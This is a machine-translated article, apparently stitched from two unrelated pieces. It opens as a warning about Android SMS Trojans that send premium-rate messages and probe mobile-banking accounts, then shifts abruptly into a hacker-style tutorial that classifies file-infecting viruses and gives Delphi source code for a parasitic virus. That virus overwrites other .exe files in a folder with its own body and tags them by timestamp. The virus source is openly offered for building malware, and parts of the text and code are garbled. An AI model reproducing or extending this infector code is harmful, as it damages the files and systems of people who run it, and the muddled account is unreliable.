In recent years, you can catch a virus not only after unsuccessfully surfing the Internet - now hackers and scammers are much more sophisticated. Today we will tell you how to fight attackers who send dangerous messages with malicious links. We will tell you how dangerous it is to navigate through it and how to avoid the threat of infecting your phone.

What kind of newsletter is this?

So, since the end of May, the phones of hundreds of thousands of users have been subject to a hidden attack by scammers. Short, intriguing messages arrive on smartphones - “Hey, look at the photo and link!”, to which the site address for the transition is attached. Sometimes notes are added that “this is not spam”, or “we need to figure it out”, can be added surname, or call "Help". In fact, if you don’t think about it right away, you can click on it and download the file. You hope that you will open a photo from a friend, but you get nothing. It is at this moment that the phone downloads virus app.

If you look at the file extension in the download log, you will see that there is no jpg there, it is running APK program. A viral bootloader, specifically in this case, causes many settings on the phone to change.

Users cannot always recognize a virus on their mobile phone and, accordingly, they cannot erase the malicious program or take any action before the virus gains access to personal data.

At the moment, Android smartphones are considered the most vulnerable. A new virus has appeared via SMS on Android.

In open-source smartphones, which is the Android operating system, new viruses spread with incredible speed.

Now they have changed. Previously, they only tried to use money on mobile phones, but today they are targeting bank cards and all the funds available in the Internet bank. Fraudsters are primarily interested in smartphones that support the Mobile Bank service. It allows you to steal money from the victim’s account using the scammer’s number. To do this, they send the virus via SMS to Android.

How scammers operate

The first such virus became active in early summer 2017. The danger is that the Trojan operates remotely on an Android smartphone.

Attackers send SMS to the desired number, so in order to identify the presence of this virus in their mobile gadget, smartphone owners should pay attention to the increase in the number of SMS messages costing 100 rubles. As a result, an amount divisible by 100 is withdrawn from the smartphone owner’s mobile account.

To make significant money, an attacker is forced to send several SMS Trojans from his victim’s number. After all, he is not the only one working in this fraudulent chain.

The Trojan settles in the victim’s gadget and sends SMS from the victim’s number to the “dear” number of the scammers. And it is for these SMS messages addressed to this “expensive” number that the victim is charged 100 rubles. for each unauthorized SMS message.

Intermediaries in this scheme can be a telecom operator, provider and other partners who may not know about the tricks of the scammers. To cover all expenses and earn money, the attacker needs to withdraw at least 1,000 rubles from each number.

At the same time, we cannot exclude the possibility that smartphone owners may complain to their operator about the theft of money. And then they take retaliatory measures to prevent fraud. For example, they may introduce a requirement to enter additional confirmations before debiting money and the like. In such a situation, attackers are forced to look for new methods of fraud.

Thanks to these factors, another Trojan appeared. This representative of Trojan-SMS also executes commands received from the remote server.

The new virus is more flexible and perfectly navigates any conditions, taking into account the barriers of the cellular operator, and even the state of the subscriber’s account and the time of transactions.

How the virus works

The new virus is dormant - it has no independence. Even when it gets into a smartphone, it does not appear in any way. For it to work, a remote command from the owner of the phone is required.

For this, the so-called POST request is used. It is intended for a request in which the web server accepts data enclosed in the body of the message for storage. It is often used, for example, to download a file.

Using a POST request allows you to establish a connection with a remote server and receive the appropriate command, upon receiving which the Trojan begins sending expensive SMS messages from the numbers of its victims to the number of the scammers.

How does the new Trojan work? For example, the program automatically sends SMS messages with one word “BALANCE” to a number that supports Mobile Banking.

By sending an SMS message from a short number, scammers can check whether the victim’s number is linked to a bank account and what the status of the account is.

Examples from life

For example, Sberbank has a number from which messages are sent - 900. When the message “BALANCE” (or, perhaps, in Russian “balance”) arrives from the sender 900, the owner of the phone, trusting Sberbank and being confident that this message is from this bank, opens the message and responds to it, wanting to know what happened to the balance. This way, scammers receive a response to their SMS, which means to them that a bank card is attached to the phone. Moreover, it becomes clear to them that this card can be managed using SMS commands, which is included in the Mobile Bank service. And then, as they say, “a matter of technique.”

One of my friends recently received messages from the short number 4-74-1, which is registered with the Sberbank mobile bank with the message “The service is unavailable, try again later.” For obvious reasons, she did not send a response, already knowing about the possible threats. Apparently these are the same scammers, masquerading as a mobile bank, in this way they tried to calculate her reaction and determine whether a mobile bank was installed on her smartphone.

Classification

HLLO-High Level Language Overwrite. Such a virus rewrites the program with its body. Those.
the program is destroyed, and when the user tries to run the program, the virus starts and “infects” further.

HLLC-High Level Language Companion. Most of these viruses date back to hoary antiquity (8-10 years ago), when users had DOS and were very lazy. These viruses look for a file and, without changing it, create a copy of themselves, but with the .COM extension. If a lazy user writes only the file name on the command line, then DOS first looks for the COM file, launching the virus, which first does its job and then launches the EXE file. There is another modification
HLLC - more modern (7 years old;)): The virus renames the file, keeping the name, but changing the extension - from EXE to, say, OBJ or MAP. The virus replaces the original file with its body. Those. the user launches a virus, which, after reproducing, launches the desired program - everyone is happy.

HLLP-High Level Language Parasitic. The most advanced. Attribute their body to the file from the front (the virus starts first, then it restores the program and runs it) or from the back
- then in the header of the program we write jmp near to the body of the virus, still launching first.

We can leave the program itself unchanged, then it will look like this:

What is MZ, I think you guessed it :) These are the initials of your beloved Mark Zbikowski, which he modestly defined in the signature of the exe file :) And I entered them here just so that you understand
- infection occurs according to the principle of copy /b virus.exe program.exe, and there are no special tricks here. Not now. But you and I will fuck them up
- Be healthy:). Well, for example: you can encrypt the first 512 or more bytes of the original program with any algorithm known to you - XOR/XOR, NOT/NOT, ADD/SUB, then it will look like:

In this case, the structure of the infected file will not be so clear.
It’s not for nothing that I’m blabbing so much here (in the classification, in the sense)
- the parasitic algorithm is used by 90% of modern viruses, regardless of their method of distribution. Okay, let's move on:

Network virus. Can be any of the above. It differs in that its distribution is not
limited to one computer, this infection somehow gets through the Internet or local network to other machines. I think you bring 3-4 of these friends out of your soap box on a regular basis.
- here's an example of a network virus. And once it gets onto someone else’s computer, it infects files in an arbitrary manner, or does not infect them AT ALL.

Macro viruses, script viruses, IRC viruses. I put them in one group because these are viruses written in languages ​​built into applications (MSOffice:)), scripts (your favorite VBS rules here) and IRC scripts. Strictly speaking, as soon as a sufficiently powerful (and/or leaky) script component appears in an application, viruses immediately begin to be written on it 😉 By the way, macro viruses are very simple and are easily identified by heuristics.

Coding

We got there 🙂 Come on, launch Delphi, kill all sorts of windows and wipe all the nonsense from the project window. That is, wipe everything off :) We will only work with DPR containing:

program EVIL_VIRUS;
USES WINDOWS,SYSUTILS;
begin
end;

I think you already understood the logic of the virus from the classification - we restore and launch the program --> wait for its work to complete - -> erase the “used file” (I forgot to say - we DO NOT TREAT the infected program, we transfer the original code to the left file and run EXAMPLE: Infected file NOTEPAD.EXE. Create the file _NOTEPAD.EXE in the same directory with the original code, and run it).--> look for an uninfected file and infect it. That's all :) The basic design of the virus looks exactly like this.

Now declare the following variables and constants for your mighty brain:

VaR VirBuf, ProgBuf, MyBuf: array of char;
SR: TSearchRec;
My,pr: File;
ProgSize,result: integer;
PN,st: String;
si: Tstartupinfo;
p:Tprocessinformation;
infected: boolean;
CONST VirLen: longint= 1000000;

The first line contains dynamic arrays into which we will write the body of the virus and the program, respectively; Will be written to the SR variable
characteristics of the found file that is a candidate for infection (I hope you are familiar with the FindFirst and FindNext procedures, because it will get worse;)), My and
Pr is the file where we started from and the left file with the original program code (I already wrote about it above). result - the result of FindFirst, it must be equal to zero,
ProgSize - program code size. The rest is clear from what follows, except
infected - this is a sign that the found file is infected and
VirLen is the length of the virus code, you will only find out after the wedding. Ugh, I wanted to say after compilation. Those. compile, change the value of the constant in the source and recompile.
Let’s code further :) Here you see the code responsible for restoring and launching the infected program:

SetLength(virbuf,VirLen);
AssignFile(my,ParamStr(0));
st:= paramstr(0);
St:= st+#0;
CopyFile (@st,"c:\windows\program.exe",false);
IF FileSize (my)> VirLen then
begin
//Run the program
AssignFile(my,"c:\windows\program.exe);
Reset(my);
ProgSize:= FileSize(my)-VirLen;
BlockRead(my,virbuf,virlen);
SetLength(progbuf,pRogSize);
BlockRead(my,progbuf,progSize);
CloseFile(my);
PN:= "_"+ParamStr(0);
AssignFile(pr,PN);
ReWrite(pr);
BlockWrite(pr,progbuf,progSize);
CloseFile(pr);
FillChar(Si, SizeOf(Si) , 0);
with Si do
begin
cb:= SizeOf(Si);
dwFlags:= startf_UseShowWindow;
wShowWindow:= 4;
end;
PN:= PN+#0;
Createprocess(nil,@PN,nil,nil,false,Create_default_error_mode,nil,nil,si,p);
Waitforsingleobject(p.hProcess,infinite);
//Started, the program ran. Let's erase it :)
ErAsE(pr);
Erase (my);

Everything here is, in principle, simple and clear, except why I moved the entire infected file to the Windows directory and what lines 3 to 5 inclusive do.
I did this because reading from a running file is inconvenient and is only possible using CreateFile and ReadFile WinAPI. I’ll tell you about coding using WinAPI later, now I’ll just cover the basics
- in Delphi.

These lines are the conversion of string to pchar using the traditional method, since we are now fighting for every byte of code. Another point: I acted incorrectly by setting the c:\windows path so strictly. Better use the GetWindowsDirectory procedure, find out for sure :) Everything else is clear without any comments (if not
stop skipping computer science;)), let's move on:

result:= FindFirst("*.exe",faAnyFile,sr);
WHILE Result= 0 DO
begin
//Check for lice
Infected:= false;
IF DateTimeToStr (FileDateToDateTime (fileage (sr.name)))= "08/03/98 06:00:00" then infected:= true;
//Checked!
IF (infected= false)and (sr.name<>paramstr(0)) then
begin
AssignFile(my,sr.Name);
ReWrite(my);
BlockWrite(my,virbuf,virlen);
BlockWrite(my,progbuf,sr.Size);
CloseFile(my);
FileSetDate(sr.Name,DateTimeToFileDate(StrToDateTime("08/03/98 06:00:00")));
end;
end;

//If the virus is launched “clean”, i.e. not from an infected program, then we exit
end else halt;

What does your keen eye see here? That's right, the FindFirst procedure searches for the given victim (any exe file from the current directory), transfers its characteristics to the SR variable. Then you need to check it for contamination. This is done in an original way: when infected, the file is assigned a def. date and time. And any file with such characteristics is considered infected. Everything else is again obscenely simple, so I smoothly move on to the conclusion :)

Conclusion

So we coded our first virus. For now, it can only infect files in the current directory (although I’m sure you can easily upgrade it ;)) and knows nothing about other directories and the Internet. Don't despair, we'll teach him this quickly. For now, play around with these lines and wait for the next article.

Application

I will venture to give you a description of all the procedures used in the article. This will help you look for them in the help and prepare for coding serious viruses using
WinAPI.

AssignFile - no equivalent in WinAPI - matches a file
with a variable of type File or TextFile

Reset - analogues of _lopen and CreateFile - opens
existing file and sets the position
reading to the beginning

ReWrite - _lcreate and CreateFile - creates a new file and
mouth reading position to the beginning. If you feed
ReWrite an existing file, its contents
will be reset to zero

BlockRead - _lread and ReadFile - reads into the buffer
a certain amount of data from a file

BlockWrite - _lwrite and WriteFile - respectively, writes
data to file

SeekFile - _llseek and SetFilePointer - moves position
read/write in open file

CloseFile - _lclose and CloseHandle - closes an open one
file

Erase - DeleteFile - deleting a file

FindFirst - FindFirstFile - search for a file by criteria

FindNext - FindNextFile - search for the next file